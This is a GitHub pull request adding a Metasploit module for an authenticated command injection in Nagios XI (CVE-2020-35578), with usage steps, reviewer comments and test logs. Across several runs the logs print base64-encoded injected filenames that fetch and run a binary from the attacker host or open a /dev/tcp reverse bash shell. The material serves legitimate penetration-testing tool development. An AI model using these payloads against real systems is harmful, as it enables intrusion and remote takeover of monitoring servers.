Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578) #14700

Merged
merged 5 commits into from
Apr 14, 2021
Merged

Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578) #14700

merged 5 commits into from
Apr 14, 2021

Conversation

ErikWynter
Copy link
Contributor

About

This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-35578) in Naxios XI version 5.7.X (and possibly older versions) to achieve remote code execution as the apache user. The check method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

Vulnerable Application

Nagios XI version 5.7.X (and possibly older versions)

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
  3. Do: set RHOSTS [IP]
  4. Do: set USERNAME [username for the Nagios XI account]
  5. Do: set PASSWORD [password for the Nagios XI account]
  6. Do: set target [target]
  7. Do: set payload [payload]
  8. Do: set LHOST [IP]
  9. Do: exploit

Options

PASSWORD

The password for the Nagios XI account to authenticate with.

TARGETURI

The base path to Nagios XI. The default value is /nagiosxi/.

USERNAME

The username for the Nagios XI account to authenticate with. The default value is nagiosadmin.

Targets

Id  Name
--  ----
0   Linux
1   CMD

Scenarios

Nagios XI 5.7.3 running on CentOS 7 - Linux target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4011             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4011 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

Nagios XI 5.7.3 running on CentOS 7 - CMD target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4012 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

@ErikWynter ErikWynter mentioned this pull request Feb 1, 2021
Merged
6 tasks
@bcoles
Copy link
Contributor

bcoles commented Feb 6, 2021
edited
Loading

This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-35578) in Naxios XI version 5.7.X (and possibly older versions)

This is exploitable since 5.4.4 and possibly earlier. It is not exploitable in 5.2.3. Unfortunately I don't have any 5.3.x systems to test.

NagiosXI 5.7.5 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=6pcraj61np3cm0vv20n76v8m06;", "nagiosxi=142916gc815c2f6s7dcipurv34;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/yZbGJUFabdnV
[*] Local IP: http://10.1.1.117:8080/yZbGJUFabdnV
[*] Client 10.1.1.115 (Wget/1.14 (linux-gnu)) requested /yZbGJUFabdnV
[*] Sending payload to 10.1.1.115 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.115
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 15 opened (10.1.1.117:4444 -> 10.1.1.115:47204) at 2021-02-06 02:31:06 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oa1dOdG90TyBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3laYkdKVUZhYmRuVjtjaG1vZCAreCAvdG1wL2hrV050b3RPOy90bXAvaGtXTnRvdE87cm0gLWYgL3RtcC9oa1dOdG90Tw== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oa1dOdG90TyBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3laYkdKVUZhYmRuVjtjaG1vZCAreCAvdG1wL2hrV050b3RPOy90bXAvaGtXTnRvdE87cm0gLWYgL3RtcC9oa1dOdG90Tw== | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

NagiosXI 5.6.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=hrjgvok7mebml9dp3bjs5vsse4;", "nagiosxi=02e1tpgvfs54afj3sr2i42teo5;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.7
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/8dvLNpsCRUH7i
[*] Local IP: http://10.1.1.117:8080/8dvLNpsCRUH7i
[*] Client 10.1.1.114 (Wget/1.14 (linux-gnu)) requested /8dvLNpsCRUH7i
[*] Sending payload to 10.1.1.114 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.114
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 9 opened (10.1.1.117:4444 -> 10.1.1.114:33022) at 2021-02-06 02:00:55 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.1.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

NagiosXI 5.5.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=bfi0lcddc20luls8km2288ofn5;", "nagiosxi=h3bhqdiknqqshcu40kadc90v25;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/BYasjRKBjTq1EZ
[*] Local IP: http://10.1.1.117:8080/BYasjRKBjTq1EZ
[*] Client 10.1.1.118 (Wget/1.14 (linux-gnu)) requested /BYasjRKBjTq1EZ
[*] Sending payload to 10.1.1.118 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.118
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 6 opened (10.1.1.117:4444 -> 10.1.1.118:37978) at 2021-02-06 01:33:20 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.3.3.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

NagiosXI 5.4.10 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=d8a52ec3f16p8orucsackd0654;", "nagiosxi=2ullbdg14e5jgdq4up5a82c5f7;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.10
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/wPmv4I4BlM9z
[*] Local IP: http://10.1.1.117:8080/wPmv4I4BlM9z
[*] Client 10.1.1.112 (Wget/1.12 (linux-gnu)) requested /wPmv4I4BlM9z
[*] Sending payload to 10.1.1.112 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.112
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 5 opened (10.1.1.117:4444 -> 10.1.1.112:42600) at 2021-02-06 01:32:26 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

NagiosXI 5.4.4 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=2dncsg6qlsmeo3faaofkf4t683;", "nagiosxi=deleted;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.4
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/9sVlIgnTgQc7k
[*] Local IP: http://10.1.1.117:8080/9sVlIgnTgQc7k
[*] Client 10.1.1.110 (Wget/1.12 (linux-gnu)) requested /9sVlIgnTgQc7k
[*] Sending payload to 10.1.1.110 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.110
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 7 opened (10.1.1.117:4444 -> 10.1.1.110:45116) at 2021-02-06 01:36:27 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.1.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

NagiosXI 5.2.3 (fail)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=aib85nrofigutif5uknm6vrvm1;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.2.3
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) >

@bcoles bcoles added the blocked Blocked by one or more additional tasks label Feb 22, 2021
@ErikWynter
Copy link
Contributor Author

Nagios Xi 5.3.0 is also vulnerable, so I will assume the vulnerable range (inclusive) is 5.3.0 - 5.7.9

Nagios XI 5.3.0 (success)

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.128:3423 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/Da644qIgCMel
[*] Local IP: http://192.168.91.128:8080/Da644qIgCMel
[*] Client 192.168.91.166 (Wget/1.14 (linux-gnu)) requested /Da644qIgCMel
[*] Sending payload to 192.168.91.166 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.91.166
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 3 opened (192.168.91.128:3423 -> 192.168.91.166:60000) at 2021-03-01 08:59:35 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

@gwillcox-r7 gwillcox-r7 self-assigned this Mar 13, 2021
@ErikWynter
Copy link
Contributor Author

The latest commit uses the updated mixin and updates the version and docs.

Nagios XI 5.3.0 running on CentOS 7 - Linux target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosxi         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/1V9MerMauwnh8
[*] Local IP: http://192.168.1.12:8080/1V9MerMauwnh8
[*] Client 192.168.1.16 (Wget/1.14 (linux-gnu)) requested /1V9MerMauwnh8
[*] Sending payload to 192.168.1.16 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (120/120 bytes)
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9hSVN5dVRtZiBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC8xVjlNZXJNYXV3bmg4O2NobW9kICt4IC90bXAvYUlTeXVUbWY7L3RtcC9hSVN5dVRtZjtybSAtZiAvdG1wL2FJU3l1VG1m | base64 -d | bash;#
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54012) at 2021-04-01 12:12:35 -0400
[*] Server stopped.

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)

Nagios XI 5.7.5 running on CentOS 7 - CMD target

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable.
[*] Executing the payload
[+] Deleted /usr/local/nagios/libexec/;echo MDwmMTcwLTtleGVjIDE3MDw+L2Rldi90Y3AvMTkyLjE2OC45MS4xMjgvNDQ0NDtzaCA8JjE3MCA+JjE3MCAyPiYxNzA= | base64 -d | bash;#
[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42834) at 2021-04-01 11:57:38 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0

@bcoles bcoles removed the blocked Blocked by one or more additional tasks label Apr 1, 2021
gwillcox-r7
gwillcox-r7 suggested changes Apr 8, 2021
View reviewed changes
documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md Outdated Show resolved Hide resolved
modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb Show resolved Hide resolved
modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
Comment on lines +124 to +128
when 1..3
return CheckCode::Unknown(res_array[0])
when 5 # the Nagios XI license agreement still has not been signed
return CheckCode::Detected('Failed to sign the license agreement.')
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

See my discussion on your other PR at #14701 (comment) r.e not handling cases where the result is 0 or 4 here, and how this can lead to issues down the line.

Note this also affects your @auth_cookies line below but I have minimized this to one comment for brevity's sake.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

See https://github.com/rapid7/metasploit-framework/pull/14701/files#r612653906 for more info. Basically this problem is still valid but after further discussion it was determined to be unlikely to be encountered. We will still leave this issue open for future travelers though.

modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
print_good('Successfully authenticated to Nagios XI')

# Obtain the Nagios XI version
@auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Again see discussion above, this value can actually be nil in the case where login_result is 4.

Copy link
Contributor

@gwillcox-r7 gwillcox-r7 Apr 14, 2021
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copied from https://github.com/rapid7/metasploit-framework/pull/14701/files#r612660759:

Right so technically speaking the only cases that we can hit in this case are 0 and 4, the other cases will be caught by the checks above. As mentioned at https://github.com/rapid7/metasploit-framework/pull/14701/files?file-filters%5B%5D=.rb#r612656355 whilst it is possible that case 4 could be encountered, at this point it is very unlikely given the checks that will have occurred previously, and if such a case does happen it would mean that something is seriously wrong with the NagiosXI install.

When login_result is 0 though, the result will be [0, [res_index.body, auth_cookies]] in which case this makes sense.

I will leave this comment here though as a warning though as if the mixin does expand and lets say option 6 is added where the second element is not an array containing at least two elements then this line will end up failing so caution is advised.

modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb Outdated Show resolved Hide resolved
@gwillcox-r7
Copy link
Contributor

Alright I resolved all issues minus the two that we agreed would remain open as there is little chance of them being hit but we wanted to make people aware of the issue in case people encounter the issue in the future.

Rest will be fixed in a commit I will push up in a second, after which I will then start testing.

@gwillcox-r7
Copy link
Contributor

Alright so looks like I did find a small error which we may also have to fix in the previous PR I landed as well. In particular in the check function we do the following bit of code:

  nagios_version = nagios_xi_version(res_array[0])
    if nagios_version.nil?
      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
    end

    print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
    @version = Rex::Version.new(nagios_version)

The problem with this is that depending on the release, nagios_version could also be a value of something like 2014R2.7, which results in an error when it gets passed to Rex::Version.new() which doesn't know how to handle this, resulting in cases like the following:

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 172.25.33.151:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[-] Exploit failed: ArgumentError Malformed version number string 2014R2.7
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) >

@gwillcox-r7
Copy link
Contributor

Exploit works brilliantly on a Nagios XI 5.5.6 target, will upload updated documentation shortly. Seems its just the issue mentioned above that I'll need to address.

@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Apr 14, 2021
edited
Loading

Alright I came up with this regex which should help prevent the issue above:

print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
    end

Note that cause of the print_status output though we will still print out the correct target version.

Oh and with this update we now get the right output:

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > exploit

[*] Started reverse TCP handler on 172.25.33.151:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 2014R2.7
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: no-target: Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) >

@gwillcox-r7
Update scenarios in documentation and also update the module to handl…
61395f3 
…e cases where the version number may not be in a format that Rex::Text can immediately handle.
@gwillcox-r7 gwillcox-r7 merged commit 832ca92 into rapid7:master Apr 14, 2021
